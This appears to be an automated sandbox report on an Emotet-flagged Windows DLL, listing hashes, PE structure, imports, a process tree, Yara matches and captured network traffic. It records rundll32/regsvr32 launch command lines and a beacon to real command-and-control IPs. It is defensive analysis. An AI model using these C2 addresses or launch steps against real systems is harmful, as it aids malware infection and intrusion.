                                                                                                                          Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                                          File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                          Entropy (8bit):6.482098733128464
                                                                                                                          TrID:
                                                                                                                          • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                                          • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                                          • DOS Executable Generic (2002/1) 1.70%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                          File name:yj81rxDZIp.dll
                                                                                                                          File size:545280
                                                                                                                          MD5:4f1cdae4390ecb862267f2eaaf826c74
                                                                                                                          SHA1:082de69d51991350ddfc05350073a55571c3ce5d
                                                                                                                          SHA256:c4e2c26fd37189447fcd387393974199933fdbffaadf2faaaac5347d1b0a8ef5
                                                                                                                          SHA512:04e5e7f0086810c82e1ae0e21fb953df25873f8361da4f20f5d844778d91a77cb3b71489d005ebd4fa7535f2a96db3bfbcca632cebe12d9022f899fab7efee0e
                                                                                                                          SSDEEP:12288:B4UJY9B+TenWsSEPHjMOUP9uXdt7JpfYNVr9RM54RutCTdJGqIoTCZ4eEsZiHxHy:B4UJY9BSenZSEPHjMOUP9Udt7JpfYNVe
                                                                                                                          TLSH:33C4CFA5435C08FCE762C3395C975BC5B1F7BDAE0664AF260BC18DA05E1BA90F53A381
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.H.v.&.v.&.v.&.h...o.&.h...2.&.h.....&.Q6].s.&.v.'.9.&.h...w.&.h...w.&.h...w.&.h...w.&.Richv.&.........PE..d.....}b.........."
                                                                                                                          Icon Hash:74f0e4ecccdce0e4
                                                                                                                          Entrypoint:0x1800423a8
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x180000000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                          Time Stamp:0x627D8598 [Thu May 12 22:09:28 2022 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:5
                                                                                                                          OS Version Minor:2
                                                                                                                          File Version Major:5
                                                                                                                          File Version Minor:2
                                                                                                                          Subsystem Version Major:5
                                                                                                                          Subsystem Version Minor:2
                                                                                                                          Import Hash:b268dbaa2e6eb6acd16e04d482356598
                                                                                                                          Instruction
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp+08h], ebx
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp+10h], esi
                                                                                                                          push edi
                                                                                                                          dec eax
                                                                                                                          sub esp, 20h
                                                                                                                          dec ecx
                                                                                                                          mov edi, eax
                                                                                                                          mov ebx, edx
                                                                                                                          dec eax
                                                                                                                          mov esi, ecx
                                                                                                                          cmp edx, 01h
                                                                                                                          jne 00007FF408DC3317h
                                                                                                                          call 00007FF408DC54A4h
                                                                                                                          dec esp
                                                                                                                          mov eax, edi
                                                                                                                          mov edx, ebx
                                                                                                                          dec eax
                                                                                                                          mov ecx, esi
                                                                                                                          dec eax
                                                                                                                          mov ebx, dword ptr [esp+30h]
                                                                                                                          dec eax
                                                                                                                          mov esi, dword ptr [esp+38h]
                                                                                                                          dec eax
                                                                                                                          add esp, 20h
                                                                                                                          pop edi
                                                                                                                          jmp 00007FF408DC31C0h
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp+08h], ecx
                                                                                                                          dec eax
                                                                                                                          sub esp, 00000088h
                                                                                                                          dec eax
                                                                                                                          lea ecx, dword ptr [00014D05h]
                                                                                                                          call dword ptr [0000FC7Fh]
                                                                                                                          dec esp
                                                                                                                          mov ebx, dword ptr [00014DF0h]
                                                                                                                          dec esp
                                                                                                                          mov dword ptr [esp+58h], ebx
                                                                                                                          inc ebp
                                                                                                                          xor eax, eax
                                                                                                                          dec eax
                                                                                                                          lea edx, dword ptr [esp+60h]
                                                                                                                          dec eax
                                                                                                                          mov ecx, dword ptr [esp+58h]
                                                                                                                          call 00007FF408DD1E9Ah
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp+50h], eax
                                                                                                                          dec eax
                                                                                                                          cmp dword ptr [esp+50h], 00000000h
                                                                                                                          je 00007FF408DC3353h
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp+38h], 00000000h
                                                                                                                          dec eax
                                                                                                                          lea eax, dword ptr [esp+48h]
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp+30h], eax
                                                                                                                          dec eax
                                                                                                                          lea eax, dword ptr [esp+40h]
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp+28h], eax
                                                                                                                          dec eax
                                                                                                                          lea eax, dword ptr [00014CB0h]
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp+20h], eax
                                                                                                                          dec esp
                                                                                                                          mov ecx, dword ptr [esp+50h]
                                                                                                                          dec esp
                                                                                                                          mov eax, dword ptr [esp+58h]
                                                                                                                          dec eax
                                                                                                                          mov edx, dword ptr [esp+60h]
                                                                                                                          xor ecx, ecx
                                                                                                                          call 00007FF408DD1E48h
                                                                                                                          jmp 00007FF408DC3334h
                                                                                                                          dec eax
                                                                                                                          mov eax, dword ptr [eax+eax+00000000h]
                                                                                                                          Programming Language:
                                                                                                                          • [ C ] VS2008 build 21022
                                                                                                                          • [LNK] VS2008 build 21022
                                                                                                                          • [ASM] VS2008 build 21022
                                                                                                                          • [IMP] VS2005 build 50727
                                                                                                                          • [RES] VS2008 build 21022
                                                                                                                          • [EXP] VS2008 build 21022
                                                                                                                          • [C++] VS2008 build 21022
                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x55cf00x6f.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x5544c0x3c.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x2dffc.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x590000xe1c.pdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x1d8.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x520000x288.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x504ca0x50600False0.389081940124zlib compressed data5.26882252971IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                          .rdata0x520000x3d5f0x3e00False0.355405745968data5.39334203825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .data0x560000x20d80x1200False0.180772569444data2.18161586025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                          .pdata0x590000xe1c0x1000False0.44580078125data4.98556265168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .rsrc0x5a0000x2dffc0x2e000False0.839408542799data7.73448363752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .reloc0x880000x6f80x800False0.1796875data1.81179169858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                          RT_RCDATA0x5a0a00x2de00dataEnglishUnited States
                                                                                                                          RT_MANIFEST0x87ea00x15aASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                          DLLImport
                                                                                                                          KERNEL32.dllExitProcess, VirtualAlloc, CompareStringW, CompareStringA, GetTimeZoneInformation, GetLocaleInfoW, GetCurrentThreadId, FlsSetValue, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, TlsAlloc, FlsGetValue, FlsFree, SetLastError, GetLastError, GetCurrentThread, FlsAlloc, HeapFree, Sleep, GetModuleHandleW, GetProcAddress, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapSetInformation, HeapCreate, HeapDestroy, RtlUnwindEx, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, HeapAlloc, HeapReAlloc, WriteFile, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetDateFormatA, GetTimeFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, HeapSize, SetEnvironmentVariableA
                                                                                                                          ole32.dllCoTaskMemFree, CoLoadLibrary, CoTaskMemAlloc
                                                                                                                          NameOrdinalAddress
                                                                                                                          DllRegisterServer10x180042050
                                                                                                                          DllUnregisterServer20x180042080
                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          EnglishUnited States
                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                          192.168.2.5150.95.66.1244977580802404312 05/14/22-04:33:59.725234TCP2404312ET CNC Feodo Tracker Reported CnC Server TCP group 7497758080192.168.2.5150.95.66.124
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          May 14, 2022 04:49:30.693954945 CEST49746443192.168.2.323.239.0.12
                                                                                                                          May 14, 2022 04:49:30.694022894 CEST4434974623.239.0.12192.168.2.3
                                                                                                                          May 14, 2022 04:49:30.694145918 CEST49746443192.168.2.323.239.0.12
                                                                                                                          May 14, 2022 04:49:30.724044085 CEST49746443192.168.2.323.239.0.12
                                                                                                                          May 14, 2022 04:49:30.724081993 CEST4434974623.239.0.12192.168.2.3
                                                                                                                          May 14, 2022 04:49:31.273504972 CEST4434974623.239.0.12192.168.2.3
                                                                                                                          May 14, 2022 04:49:31.273613930 CEST49746443192.168.2.323.239.0.12
                                                                                                                          May 14, 2022 04:49:31.775527954 CEST49746443192.168.2.323.239.0.12
                                                                                                                          May 14, 2022 04:49:31.775579929 CEST4434974623.239.0.12192.168.2.3
                                                                                                                          May 14, 2022 04:49:31.775969982 CEST4434974623.239.0.12192.168.2.3
                                                                                                                          May 14, 2022 04:49:31.776160002 CEST49746443192.168.2.323.239.0.12
                                                                                                                          May 14, 2022 04:49:31.792016983 CEST49746443192.168.2.323.239.0.12
                                                                                                                          May 14, 2022 04:49:31.832515955 CEST4434974623.239.0.12192.168.2.3
                                                                                                                          May 14, 2022 04:49:32.633935928 CEST4434974623.239.0.12192.168.2.3
                                                                                                                          May 14, 2022 04:49:32.634047985 CEST49746443192.168.2.323.239.0.12
                                                                                                                          May 14, 2022 04:49:32.634062052 CEST4434974623.239.0.12192.168.2.3
                                                                                                                          May 14, 2022 04:49:32.634104013 CEST4434974623.239.0.12192.168.2.3
                                                                                                                          May 14, 2022 04:49:32.634128094 CEST49746443192.168.2.323.239.0.12
                                                                                                                          May 14, 2022 04:49:32.634177923 CEST49746443192.168.2.323.239.0.12
                                                                                                                          May 14, 2022 04:49:32.634571075 CEST49746443192.168.2.323.239.0.12
                                                                                                                          May 14, 2022 04:49:32.634579897 CEST4434974623.239.0.12192.168.2.3
                                                                                                                          • 23.239.0.12
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          0192.168.2.34974623.239.0.12443C:\Windows\System32\regsvr32.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-14 02:49:31 UTC0OUTGET / HTTP/1.1
                                                                                                                          Cookie: PukgQ=fwT4jaWVXqy4FOPB16oF0T0i4Guh1rTeK46tPoYmMLU5jQJ2MP23iyeG23+aT2mppqe1SJ9h0NOytVHHb8WQxKPBWOrm+6NjR4uMnT5B/uDGQqh07xpdP9VxB+0aWEwwI7Dfj0bukq5mxXTBlziLQo7sgFudvOrhO8nHOvcJ3Yar8tI3U7SqI0HqiYLS9K9Umccxh2TITUrJPQ7dQFwEkgCTvmJOraCJo7ZdZWWbPXR6m3nIWr9dKCNlVFVxN8p+zSBKwb2tl4PP7v+OCx/66c3C7sIrrIRyEuZBo4MxgcZG9pgpyTA=
                                                                                                                          Host: 23.239.0.12
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2022-05-14 02:49:32 UTC0INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 14 May 2022 02:49:32 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2022-05-14 02:49:32 UTC0INData Raw: 31 39 63 0d 0a 8a bf 95 e7 a0 e8 2c 3f e4 db 14 1b 73 9a 83 88 87 7b f0 8d 92 6c de 28 a6 0e 08 1c 42 72 1b 79 07 11 89 06 d0 72 ca 8c 82 3d 67 e6 98 13 a8 4d f0 53 f1 e9 b7 bf be cf 0a 17 61 83 70 fb 19 13 82 78 3d 98 40 17 23 41 59 56 18 dc 16 0f e8 25 16 48 62 d5 0c 77 4d dd 29 16 1d 69 98 fc a2 f7 8a d9 cb 76 b6 1d 52 f8 81 36 03 c5 75 00 0e e4 cc e5 25 0a 8b 99 0f 6a a5 be 76 db d8 53 9f 5f 28 97 6b 55 30 1a 28 7c ad d1 dd 7d 69 03 ef ae 6e 54 86 b9 5a 78 45 45 f9 e4 4d 25 bc 44 c5 ce 3a e9 f2 58 b5 c7 15 e3 f8 03 d5 45 fc 10 1d 11 be 0f af 75 04 ff 49 88 12 a7 ae c8 12 c3 8d df f0 c3 e9 eb e0 8e 24 84 dd 4e 1d 7c 1e 5a 81 2b aa a4 30 6b 8f f3 6b 20 6d e8 9b 28 d7 4c 1d 52 e7 df f5 f4 88 a7 bb 60 0b d1 f1 c6 4b d3 43 d5 47 c4 63 e2 a7 95 ed ef aa 93
                                                                                                                          Data Ascii: 19c,?s{l(Bryr=gMSapx=@#AYV%HbwM)ivR6u%jvS_(kU0(|}inTZxEEM%D:XEuI$N|Z+0kk m(LR`KCGc


                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:04:48:51
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\loaddll64.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:loaddll64.exe "C:\Users\user\Desktop\yj81rxDZIp.dll"
                                                                                                                          Imagebase:0x7ff6aa010000
                                                                                                                          File size:140288 bytes
                                                                                                                          MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Target ID:1
                                                                                                                          Start time:04:48:52
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\yj81rxDZIp.dll",#1
                                                                                                                          Imagebase:0x7ff6a5160000
                                                                                                                          File size:273920 bytes
                                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Target ID:2
                                                                                                                          Start time:04:48:52
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:regsvr32.exe /s C:\Users\user\Desktop\yj81rxDZIp.dll
                                                                                                                          Imagebase:0x7ff70c090000
                                                                                                                          File size:24064 bytes
                                                                                                                          MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.277397167.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high

                                                                                                                          Target ID:3
                                                                                                                          Start time:04:48:52
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\yj81rxDZIp.dll",#1
                                                                                                                          Imagebase:0x7ff747fb0000
                                                                                                                          File size:69632 bytes
                                                                                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.280535060.0000026800000000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.280399426.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high

                                                                                                                          Target ID:4
                                                                                                                          Start time:04:48:53
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\yj81rxDZIp.dll,DllRegisterServer
                                                                                                                          Imagebase:0x7ff747fb0000
                                                                                                                          File size:69632 bytes
                                                                                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.280320668.00000198952A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high

                                                                                                                          Target ID:5
                                                                                                                          Start time:04:48:57
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\yj81rxDZIp.dll,DllUnregisterServer
                                                                                                                          Imagebase:0x7ff747fb0000
                                                                                                                          File size:69632 bytes
                                                                                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Target ID:6
                                                                                                                          Start time:04:48:58
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NaMuLvbxXsNvT\LkWax.dll"
                                                                                                                          Imagebase:0x7ff70c090000
                                                                                                                          File size:24064 bytes
                                                                                                                          MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.662769151.00000000012F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.665142316.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high

                                                                                                                          Target ID:7
                                                                                                                          Start time:04:49:04
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Target ID:8
                                                                                                                          Start time:04:49:05
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Target ID:9
                                                                                                                          Start time:04:49:09
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Target ID:10
                                                                                                                          Start time:04:49:10
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Target ID:12
                                                                                                                          Start time:04:49:11
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                          Imagebase:0x7ff662080000
                                                                                                                          File size:163336 bytes
                                                                                                                          MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Target ID:13
                                                                                                                          Start time:04:49:11
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Target ID:16
                                                                                                                          Start time:04:49:20
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Target ID:17
                                                                                                                          Start time:04:49:30
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Target ID:19
                                                                                                                          Start time:04:49:58
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Target ID:23
                                                                                                                          Start time:04:50:06
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Target ID:25
                                                                                                                          Start time:04:50:12
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                          Imagebase:0x7ff7b0320000
                                                                                                                          File size:455656 bytes
                                                                                                                          MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                          Has elevated privileges:true
